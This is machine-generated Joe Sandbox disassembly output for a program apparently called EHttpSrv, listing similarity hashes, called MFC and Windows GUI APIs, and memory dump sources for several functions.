                                                                                                                • API ID: MessageSend$#1079$#2651$#6749MetricsSystem$#1176#1555#2364#2366#3869#4109#4574ClientColorCursorDestroyIconLoadRect
                                                                                                                • String ID: Column_0
                                                                                                                • API String ID: 2103283411-1630879286
                                                                                                                • Opcode ID: 5d6fa8bb70667fd672e0d5e94e862f5e3e0c697cce582e92b5d20558c6df8bb8
                                                                                                                • Instruction ID: dd8e0921d3901aff80e3a421ab691459f02cf68530f25cea5a982d83c5e6769e
                                                                                                                • Opcode Fuzzy Hash: 5d6fa8bb70667fd672e0d5e94e862f5e3e0c697cce582e92b5d20558c6df8bb8
                                                                                                                • Instruction Fuzzy Hash: 8281D671780705BBE224DBA4CC86F6AB7A4BF54B08F10C61CF7596B2D1DBB8B8448791
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(000004E9,00000000,?,20458068,?,00000000), ref: 204582EA
                                                                                                                • #2155.MFC80U(000004E9,00000000,?,20458068,?,00000000), ref: 204582F1
                                                                                                                • #2651.MFC80U(000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 204582FE
                                                                                                                • #2155.MFC80U(000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458305
                                                                                                                • #2651.MFC80U(000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458312
                                                                                                                • #2155.MFC80U(000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458319
                                                                                                                • #2651.MFC80U(000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458326
                                                                                                                • #2155.MFC80U(000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 2045832D
                                                                                                                • #2651.MFC80U(000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 2045833A
                                                                                                                • #2155.MFC80U(000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458341
                                                                                                                • #2651.MFC80U(000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 2045834E
                                                                                                                • #2155.MFC80U(000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458355
                                                                                                                • #2651.MFC80U(000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068), ref: 20458362
                                                                                                                • #2155.MFC80U(000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068), ref: 20458369
                                                                                                                • #2651.MFC80U(000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000), ref: 20458376
                                                                                                                • #2155.MFC80U(000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000), ref: 2045837D
                                                                                                                • #2651.MFC80U(00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000), ref: 2045838A
                                                                                                                • #2155.MFC80U(00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000), ref: 20458391
                                                                                                                • #2651.MFC80U(00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000), ref: 2045839E
                                                                                                                • #2155.MFC80U(00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000), ref: 204583A5
                                                                                                                • #2651.MFC80U(00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000), ref: 204583B2
                                                                                                                • #2155.MFC80U(00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000), ref: 204583B9
                                                                                                                • #2651.MFC80U(00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000), ref: 204583C6
                                                                                                                • #2155.MFC80U(00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000), ref: 204583CD
                                                                                                                • #2651.MFC80U(000004EF,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000), ref: 204583DA
                                                                                                                • #2155.MFC80U(000004EF,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000), ref: 204583E1
                                                                                                                • #2651.MFC80U(00000481,000004EF,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB), ref: 2045840D
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 20458425
                                                                                                                • #2651.MFC80U(00000480,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA), ref: 20458432
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 20458444
                                                                                                                • #2651.MFC80U(00000485,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA), ref: 20458451
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 20458463
                                                                                                                • #2651.MFC80U(00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB), ref: 20458474
                                                                                                                • #2155.MFC80U(00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB), ref: 2045847B
                                                                                                                • #2651.MFC80U(00000502,00000000,00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8), ref: 20458488
                                                                                                                • #2155.MFC80U(00000502,00000000,00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8), ref: 2045848F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$#2155$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2554225707-0
                                                                                                                • Opcode ID: 2a91c41e58a9239e0cf9fb06e0310c7268f69ef36e89a5c0e7b838b5ee56a8b0
                                                                                                                • Instruction ID: 77c20bd14644053fe35fb93ba4e152a15ee534d5efd993665a1fbf02ccc77aa3
                                                                                                                • Opcode Fuzzy Hash: 2a91c41e58a9239e0cf9fb06e0310c7268f69ef36e89a5c0e7b838b5ee56a8b0
                                                                                                                • Instruction Fuzzy Hash: 2B41EDB07C06516AD91963F14C67FBF156ADBE2E08F80C52CB2426FAE0DDAC9D038759
                                                                                                                APIs
                                                                                                                • #347.MFC80U(FEEA6C22), ref: 20422439
                                                                                                                • #1270.MFC80U(?), ref: 20422451
                                                                                                                • #5584.MFC80U(?), ref: 2042245A
                                                                                                                • CopyRect.USER32(?,?), ref: 2042246C
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 2042249F
                                                                                                                • #1271.MFC80U(00000000), ref: 204224AA
                                                                                                                • #5635.MFC80U(20488C48,00000000), ref: 204224B8
                                                                                                                • #1925.MFC80U(20488C48,00000000), ref: 204224C1
                                                                                                                • GetSysColor.USER32(0000000F), ref: 204224C8
                                                                                                                • #326.MFC80U(00000000), ref: 204224D3
                                                                                                                • FillRect.USER32(?,?,?), ref: 204224EF
                                                                                                                • SendMessageW.USER32(?,0000120B,?,?), ref: 2042252B
                                                                                                                • CopyRect.USER32(?,?), ref: 20422577
                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00008924), ref: 204225D8
                                                                                                                • GetSysColor.USER32(00000014), ref: 204225FC
                                                                                                                • #502.MFC80U(00000000,00000001,00000000), ref: 20422607
                                                                                                                • GetSysColor.USER32(00000010), ref: 20422616
                                                                                                                • #502.MFC80U(00000000,00000001,00000000), ref: 20422621
                                                                                                                • #5638.MFC80U(?,00000000,00000001,00000000), ref: 20422637
                                                                                                                • #4117.MFC80U(?,?,?,?,00000000,00000001,00000000), ref: 2042265E
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,00000000,00000001,00000000), ref: 20422678
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 20422698
                                                                                                                • #5638.MFC80U(?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 204226A6
                                                                                                                • #4117.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 204226C8
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 20422765
                                                                                                                • #5638.MFC80U(00008924,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20422773
                                                                                                                • #5519.MFC80U(?), ref: 204227A3
                                                                                                                • #1957.MFC80U(?), ref: 204227AC
                                                                                                                  • Part of subcall function 20414A70: #1925.MFC80U(FEEA6C22,?,?,?,00000000,2047B9E9,000000FF), ref: 20414AB9
                                                                                                                • #602.MFC80U(?), ref: 20422802
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#3995#5638Color$#1925#4117#502Copy$#1270#1271#1957#326#347#5519#5584#5635#602CreateDrawFillIndirectMessageSendText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1715972708-0
                                                                                                                • Opcode ID: 9fca55ed4a40095a3227d01100ba49ce01f027b267da5f4119c3224918b91aad
                                                                                                                • Instruction ID: d666b1c84b9d6d69ff095b1d7bad3806f02d2e1acc2ac58b3e1f69ded9572eef
                                                                                                                • Opcode Fuzzy Hash: 9fca55ed4a40095a3227d01100ba49ce01f027b267da5f4119c3224918b91aad
                                                                                                                • Instruction Fuzzy Hash: 7FC14D71108381AFC354CF64C995BABBBF4FF94704F408A1CF195872A4DB38A949CB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2461$#5149#5398#776$#310NamePathShort$#578#774#896EnvironmentExpandStrings_wcsicmpwcsncmp
                                                                                                                • String ID: \\?\$system
                                                                                                                • API String ID: 34813449-175627492
                                                                                                                • Opcode ID: c8e0f6914f928cd7582feb275fcfeaa506cf759af608ad1b60c1f88940210c27
                                                                                                                • Instruction ID: 742173bcf6f87cae9c2c156507115ba212f5655925c953d735356dab2d6ead28
                                                                                                                • Opcode Fuzzy Hash: c8e0f6914f928cd7582feb275fcfeaa506cf759af608ad1b60c1f88940210c27
                                                                                                                • Instruction Fuzzy Hash: 3051C6B15087019FC700EF64CCC9A9EB7E4EB84719F40893DF992932A1EE785949CB91
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 20413232
                                                                                                                • #6086.MFC80U(00000000,FEEA6C22), ref: 20413240
                                                                                                                • #6086.MFC80U(00000000,00000000,FEEA6C22), ref: 2041324C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20413263
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20413271
                                                                                                                • #5609.MFC80U(?), ref: 2041327A
                                                                                                                • #5609.MFC80U(?,?), ref: 20413286
                                                                                                                • #762.MFC80U(000000DC,?,?), ref: 20413290
                                                                                                                • #1562.MFC80U(50804005,?,?,00000004), ref: 204132D0
                                                                                                                • #762.MFC80U(000000DC,50804005,?,?,00000004), ref: 204132DA
                                                                                                                • #1562.MFC80U(50804005,?,?,00000004), ref: 2041331B
                                                                                                                • memset.MSVCR80 ref: 2041338D
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 204133A9
                                                                                                                • #2362.MFC80U(00000000,?,?,?,00000004), ref: 204133AC
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 204133BC
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 204133CD
                                                                                                                • #1271.MFC80U(00000000,?,?,?,00000004), ref: 204133D6
                                                                                                                • CreateFontIndirectW.GDI32 ref: 204133F1
                                                                                                                • #1271.MFC80U(00000000), ref: 204133FA
                                                                                                                  • Part of subcall function 20420530: #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 2042059A
                                                                                                                  • Part of subcall function 20420530: #764.MFC80U(?,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 204205BF
                                                                                                                  • Part of subcall function 20420530: GetSysColor.USER32(0000000E), ref: 204205E4
                                                                                                                  • Part of subcall function 20420530: GetSysColor.USER32(0000000D), ref: 204205EE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1271#1562#5609#6086#762#764ColorCreateFontIndirectRectWindow$#2362#4574MessageObjectSendmemset
                                                                                                                • String ID: n$xXH
                                                                                                                • API String ID: 3384984204-2023183603
                                                                                                                • Opcode ID: 95b6b9af0db05c157245e0d8950aaf6f032ba2113402e6f7531cd004fb3b278d
                                                                                                                • Instruction ID: df89eb388f3e077dc8a7648ceea616e3fc8ae983f4d044294edd22d2daf9c446
                                                                                                                • Opcode Fuzzy Hash: 95b6b9af0db05c157245e0d8950aaf6f032ba2113402e6f7531cd004fb3b278d
                                                                                                                • Instruction Fuzzy Hash: 34A14F71204700AFD720DBB4CC81FABB7E9BB88708F10891DF69E97291DB79A8458B55
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$_wcsnicmpmemcpy_smemmove_s
                                                                                                                • String ID: InstallDir$InstallDir32$ProductName$ProductVersion$ScannerVersion$x86\
                                                                                                                • API String ID: 308510788-164657748
                                                                                                                • Opcode ID: 9cfe9f924ec3093dbc28e29c1735e63e94f3565b95dd8854a8d1b24b8ed9160a
                                                                                                                • Instruction ID: 526b51a08f6c597bdb1942fb88777c362074db7fda32dca29dac90f820a139c1
                                                                                                                • Opcode Fuzzy Hash: 9cfe9f924ec3093dbc28e29c1735e63e94f3565b95dd8854a8d1b24b8ed9160a
                                                                                                                • Instruction Fuzzy Hash: 5CF117715083059BC7249BACCD49B9B73B4EF89308F09CA58ED4597342EB7CAB48C792
                                                                                                                APIs
                                                                                                                • #1472.MFC80U(?,FEEA6C22), ref: 20437007
                                                                                                                • #776.MFC80U(?), ref: 20437018
                                                                                                                • IsWindow.USER32(?), ref: 20437030
                                                                                                                • IsWindow.USER32(?), ref: 20437045
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 2043705E
                                                                                                                • SendMessageW.USER32(?,00001202,00000000,00000000), ref: 20437073
                                                                                                                • free.MSVCR80 ref: 20437087
                                                                                                                • malloc.MSVCR80 ref: 204370A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 204370C5
                                                                                                                • #310.MFC80U ref: 204370D5
                                                                                                                • #1053.MFC80U(?,?,00000000,0000002C), ref: 204370EC
                                                                                                                • #310.MFC80U(?,?,00000000,0000002C), ref: 20437104
                                                                                                                • #1053.MFC80U(?,?,00000000,0000003D), ref: 2043711D
                                                                                                                • #774.MFC80U(?,?,?,00000000,0000003D), ref: 2043712F
                                                                                                                • #310.MFC80U(?,?,00000000,0000003D), ref: 20437139
                                                                                                                • #1053.MFC80U(?,?,00000001,0000003D), ref: 20437152
                                                                                                                • _wtol.MSVCR80 ref: 20437160
                                                                                                                • SendMessageW.USER32(?,0000120A,00000000,00000007), ref: 204371BF
                                                                                                                • #578.MFC80U ref: 204371CD
                                                                                                                • #578.MFC80U ref: 204371DC
                                                                                                                • #1053.MFC80U(?,?,-00000001,0000002C), ref: 204371EE
                                                                                                                • realloc.MSVCR80 ref: 20437210
                                                                                                                • #3395.MFC80U(00000000,0000002C), ref: 20437236
                                                                                                                • IsWindow.USER32(?), ref: 2043724D
                                                                                                                • SendMessageW.USER32 ref: 2043726C
                                                                                                                • SendMessageW.USER32(?,0000120B,-00000001,?), ref: 20437282
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 2043728A
                                                                                                                • SendMessageW.USER32(?,0000120C,-00000001,?), ref: 204372A3
                                                                                                                • GetClientRect.USER32(?,?), ref: 204372B5
                                                                                                                • #578.MFC80U(?,?,?,?,?,?,?,?,?,?,?), ref: 204372DF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1053$#310#578Window$ClientRect$#1472#3395#774#776MetricsSystem_wtolfreemallocrealloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579592575-0
                                                                                                                • Opcode ID: 020327350494e9c27d9f7df119326d8f05867bc4b03c744ac8ffc632b2ac4eb1
                                                                                                                • Instruction ID: 4bd2b81108923beed7dd3f4ad3a2f5b679cf4373aa46a76069290c78f9d96600
                                                                                                                • Opcode Fuzzy Hash: 020327350494e9c27d9f7df119326d8f05867bc4b03c744ac8ffc632b2ac4eb1
                                                                                                                • Instruction Fuzzy Hash: 7D915D712087019FE320DB65CC89F5BB7E8BB88745F108A1CF695972A0DB79E905CB52
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 204405E0
                                                                                                                  • Part of subcall function 2042C5B0: #4574.MFC80U(?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5B9
                                                                                                                  • Part of subcall function 2042C5B0: GetWindowRect.USER32(?,?), ref: 2042C5C7
                                                                                                                  • Part of subcall function 2042C5B0: #6063.MFC80U(?,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C5E7
                                                                                                                  • Part of subcall function 2042C5B0: SendMessageW.USER32(?,00000401,00000001,00000000), ref: 2042C61C
                                                                                                                  • Part of subcall function 2042C5B0: GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042C630
                                                                                                                  • Part of subcall function 2042C5B0: #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C633
                                                                                                                  • Part of subcall function 2042C5B0: #2648.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C642
                                                                                                                  • Part of subcall function 2042C5B0: #1005.MFC80U(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C65C
                                                                                                                  • Part of subcall function 2042C5B0: GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042C66B
                                                                                                                  • Part of subcall function 2042C5B0: #2366.MFC80U(00000000,?,00000000,?,?,?,00000000,00000000,FEEA6C22), ref: 2042C66E
                                                                                                                  • Part of subcall function 2042C5B0: SetForegroundWindow.USER32(?), ref: 2042C681
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,00000000), ref: 2044062B
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000101), ref: 2044063C
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,00000000), ref: 2044065F
                                                                                                                • SendMessageW.USER32(?,00000151,00000001,?), ref: 2044067D
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,00000000), ref: 204406BA
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000102), ref: 204406CB
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,00000000), ref: 2044070A
                                                                                                                • SendMessageW.USER32(?,00000151,?,?), ref: 2044078A
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 204407A2
                                                                                                                • #310.MFC80U ref: 204407C3
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 20440800
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 20440812
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20440824
                                                                                                                • #6232.MFC80U(00000000), ref: 20440848
                                                                                                                • #776.MFC80U(?,?,?,00000000), ref: 2044098A
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 204409AC
                                                                                                                • SendMessageW.USER32(?,00000151,00000001,?), ref: 204409C0
                                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 20440A37
                                                                                                                • SendMessageW.USER32(?,00000150,00000001,00000000), ref: 20440A4F
                                                                                                                • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 20440A6B
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20440A8F
                                                                                                                • #6232.MFC80U(00000000), ref: 20440A95
                                                                                                                • #578.MFC80U(00000000), ref: 20440AAD
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20440ADB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2366#6232ItemNextWindow$#1005#2648#310#314#4574#578#6063#6751#776ForegroundRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253409394-0
                                                                                                                • Opcode ID: 1601a06762cacad1e8cbc559b100bd4cc02e4ed356e226a3da2df0017a5cfbef
                                                                                                                • Instruction ID: bc79db77f7d5a154e0c58ac83640ed0fa7abcad9e75eb80e817de5e5d5b50a70
                                                                                                                • Opcode Fuzzy Hash: 1601a06762cacad1e8cbc559b100bd4cc02e4ed356e226a3da2df0017a5cfbef
                                                                                                                • Instruction Fuzzy Hash: D1E17D71644301AFE304DF64CC95FA6B7E5BF98704F04896CFA889B291CA79F845CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2045DE90: #310.MFC80U(2045E5C1,000000FF,FEEA6C22,?,?,?,2047A422,000000FF,2045E5C1,?,?,FEEA6C22), ref: 2045DED5
                                                                                                                  • Part of subcall function 2045DE90: #310.MFC80U(?,?,?,2047A422,000000FF,2045E5C1,?), ref: 2045DEE3
                                                                                                                  • Part of subcall function 2042D2E0: #359.MFC80U(00000000,FEEA6C22), ref: 2042D320
                                                                                                                  • Part of subcall function 2042D2E0: memset.MSVCR80 ref: 2042D33C
                                                                                                                  • Part of subcall function 2042D2E0: #3998.MFC80U(?,00000000,FEEA6C22), ref: 2042D370
                                                                                                                  • Part of subcall function 2042D2E0: #6735.MFC80U(?,?,00000000,FEEA6C22), ref: 2042D382
                                                                                                                  • Part of subcall function 2042D2E0: #5832.MFC80U(?,?), ref: 2042D39F
                                                                                                                  • Part of subcall function 2042D2E0: #578.MFC80U(?,?), ref: 2042D3B0
                                                                                                                  • Part of subcall function 2042D2E0: #3828.MFC80U(?,00000000), ref: 2042D3C6
                                                                                                                  • Part of subcall function 2042D2E0: #2011.MFC80U(00000000,FEEA6C22), ref: 2042D3CD
                                                                                                                  • Part of subcall function 2042D2E0: #607.MFC80U(?,00000000), ref: 2042D3E3
                                                                                                                • #6735.MFC80U(?,?,?,FEEA6C22), ref: 2045E60D
                                                                                                                • #1476.MFC80U(?), ref: 2045E625
                                                                                                                • #578.MFC80U ref: 2045E63C
